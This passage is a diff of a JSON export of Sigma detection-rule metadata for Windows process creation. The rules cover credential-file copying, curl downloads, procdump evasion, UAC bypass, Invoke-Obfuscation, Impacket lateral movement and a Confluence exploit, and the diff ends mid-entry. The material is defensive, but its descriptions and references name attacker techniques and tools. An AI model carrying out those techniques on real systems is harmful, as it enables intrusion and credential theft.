@@ -38679,108 +31703,189 @@ "value": "HTML Help Shell Spawn" }, { - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/24", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", + "creation_date": "2019/10/21", "falsepositive": [ - "Unknown" + "Unlikely" ], - "filename": "proc_creation_win_hwp_exploits.yml", + "filename": "proc_creation_win_susp_service_path_modification.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/", - "https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1", - "https://twitter.com/cyberwar_15/status/1187287262054076416", - "https://blog.alyac.co.kr/1901", - "https://en.wikipedia.org/wiki/Hangul_(word_processor)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hwp_exploits.yml" + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" ], "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ] }, - "uuid": 
"023394c4-29d5-46ab-92b8-6a534c6f447b", - "value": "Suspicious HWP Sub Processes" + "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", + "value": "Suspicious Service Path Modification" }, { - "description": "Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files", + "description": "Files with well-known filenames (sensitive files with credential data) copying", "meta": { - "author": "frack113", - "creation_date": "2022/07/18", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", "falsepositive": [ - "Legitimate use" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], - "filename": "proc_creation_win_icacls_deny.yml", + "filename": "proc_creation_win_copying_sensitive_files_with_credential_data.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" + ] + }, + "uuid": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "value": "Copying Sensitive Files with Credential Data" + }, + { + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali (updated)", + "creation_date": "2020/07/03", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_curl_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/max_mal_/status/1542461200797163522", + "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "value": "Suspicious Curl Usage on Windows" + }, + { + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_format.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1477925112561209344", + "https://twitter.com/wdormann/status/1478011052130459653?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_format.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "value": "Format.com FileSystem LOLBIN" + }, + { + "description": "Detects possible password spraying attempts using Dsacls", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate use of dsacls to bind to an LDAP session" + ], + "filename": 
"proc_creation_win_dsacls_password_spray.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_icacls_deny.yml" + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.execution", + "attack.t1218" ] }, - "uuid": "4ae81040-fc1c-4249-bfa3-938d260214d9", - "value": "Use Icacls to Hide File to Everyone" + "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "value": "Password Spraying Attempts Using Dsacls" }, { - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. 
An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/28", + "author": "Bhabesh Raj", + "creation_date": "2021/09/08", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml", + "filename": "proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" + "https://nvd.nist.gov/vuln/detail/CVE-2021-26084", + "https://github.com/h3v0x/CVE-2021-26084_Confluence", + "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_atlassian_confluence_cve_2021_26084_exploit.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ] }, - "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "value": "Microsoft IIS Connection Strings Decryption" + "uuid": "245f92e3-c4da-45f1-9070-bc552e06db11", + "value": "Atlassian Confluence CVE-2021-26084" }, { - "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", + "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\"...etc", "meta": { - 
"author": "frack113", - "creation_date": "2022/01/09", + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2020/10/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_iis_http_logging.yml", + "filename": "proc_creation_win_susp_wmic_proc_create.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml" + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1047" ] }, - "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", - "value": "Disable Windows IIS HTTP Logging" + "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "value": "Suspicious WMIC Execution - ProcessCallCreate" }, { "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", 
@@ -38796,8 +31901,8 @@ "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", - "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", + "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_service_account_password_dumped.yml" ], "tags": [ 
@@ -38809,1678 +31914,604 @@ "value": "Microsoft IIS Service Account Password Dumped" }, { - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file. This can be normal behaviour on developer systems.", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/27", + "author": "frack113", + "creation_date": "2022/08/28", "falsepositive": [ - "Unknown" + "Legitimate use of Nim on developer systems" ], - "filename": "proc_creation_win_imaging_devices_unusual_parents.yml", + "filename": "proc_creation_win_nimgrab.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_imaging_devices_unusual_parents.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml" ], "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.command_and_control", + "attack.t1105" ] }, - "uuid": "f11f2808-adb4-46c0-802a-8660db50fa99", - "value": "ImagingDevices Unusual Parent Or Child Processes" + "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "value": "Nimgrab File Download" }, { - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "description": "Detects the use of Advanced Port Scanner.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2021/12/18", + "falsepositive": [ + 
"Legitimate administrative use", + "Tools with similar commandline (very rare)" + ], + "filename": "proc_creation_win_advanced_port_scanner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ] + }, + "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "value": "Advanced Port Scanner" + }, + { + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", "meta": { "author": "Florian Roth", - "creation_date": "2021/07/24", + "creation_date": "2022/01/11", "falsepositive": [ - "Legitimate use of the impacket tools" + "Cases in which procdump just gets copied to a different directory without any renaming" ], - "filename": "proc_creation_win_impacket_compiled_tools.yml", + "filename": "proc_creation_win_procdump_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ] - }, - "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "value": "Impacket Tool Execution" - }, - { - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "meta": { - "author": "Ecco, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/09/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_impacket_lateralization.yml", - "level": "high", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", - "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" - ] - }, - "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", - "value": "Impacket Lateralization Detection" - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_import_cert_susp_locations.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" + "https://twitter.com/mrd0x/status/1480785527901204481", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1553.004" + "attack.t1036", + "attack.t1003.001" ] }, - "uuid": 
"5f6a601c-2ecb-498b-9c33-660362323afa", - "value": "Root Certificate Installed From Susp Locations" + "uuid": "79b06761-465f-4f88-9ef2-150e24d3d737", + "value": "Procdump Evasion" }, { - "description": "Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe).", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", + "author": "Florian Roth", + "creation_date": "2021/08/07", "falsepositive": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts.", - "Legitimate usage of scripts." + "Unknown" ], - "filename": "proc_creation_win_indirect_cmd.yml", + "filename": "proc_creation_win_mailboxexport_share.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mailboxexport_share.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "value": "Suspicious PowerShell Mailbox Export to Share" + }, + { + "description": "Detects a when net.exe is called with a password in the command line", + "meta": { + "author": "Tim Shelton (HAWK.IO)", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_net_use_password_plaintext.yml", + "level": "medium", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml" + ], + "tags": "No established tags" + }, + "uuid": "d4498716-1d52-438f-8084-4a603157d131", + "value": "Password Provided In Command Line Of Net.exe" + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula option being seen in the command line.", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/08/28", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "filename": "proc_creation_win_sysinternals_eula_accepted.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md", - "https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_cmd.yml" + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.resource_development", + "attack.t1588.002" ] }, - "uuid": "fa47597e-90e9-41cd-ab72-c3b74cfb0d02", - "value": "Indirect Command Execution" + "uuid": "7cccd811-7ae9-4ebe-9afd-cb5c406b824b", + "value": "Usage of Sysinternals Tools" }, { - "description": "Detects the use of native Windows tool, forfiles to execute a file. 
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", "meta": { - "author": "Tim Rauch (rule), Elastic (idea)", - "creation_date": "2022/10/17", + "author": "pH-T, Nasreddine Bencherchali", + "creation_date": "2022/03/15", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_indirect_command_execution_forfiles.yml", + "filename": "proc_creation_win_schtasks_appdata_local_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_appdata_local_system.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "value": "Suspicious Schtasks Execution AppData Folder" + }, + { + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "value": "UAC Bypass Using Disk Cleanup" + }, + { + "description": "dotnet.exe will execute any DLL 
and execute unsigned code", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_dotnet.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a", - "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_command_execution_forfiles.yml" + "https://twitter.com/_felamos/status/1204705548668555264", + "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8", - "value": "Indirect Command Exectuion via Forfiles" - }, - { - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_infdefaultinstall.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", - "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" - ], - "tags": [ - 
"attack.defense_evasion", + "attack.execution", "attack.t1218" ] }, - "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", - "value": "InfDefaultInstall.exe .inf Execution" + "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN" }, { - "description": "Detects encoded base64 MZ header in the commandline", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_inline_base64_mz_header.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "value": "Base64 MZ Header In CommandLine" - }, - { - "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_inline_win_api_access.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/m417z/status/1566674631788007425", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ] - }, - "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "value": "Accessing WinAPI Via CommandLine" - }, - { - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key 
backdoor).", - "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/09/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_install_reg_debugger_backdoor.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" - ] - }, - "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", - "value": "Suspicious Debugger Registration Cmdline" - }, - { - "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", - "meta": { - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unlikely (at.exe deprecated as of Windows 8)" - ], - "filename": "proc_creation_win_interactive_at.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", - "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" - ] - }, - "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "value": "Interactive AT Job" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_clip.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher" - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "meta": { - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", - "falsepositive": [ - "Unknown" - ], - "filename": 
"proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_stdin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher" - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_var.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", - "value": "Invoke-Obfuscation VAR+ Launcher" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": 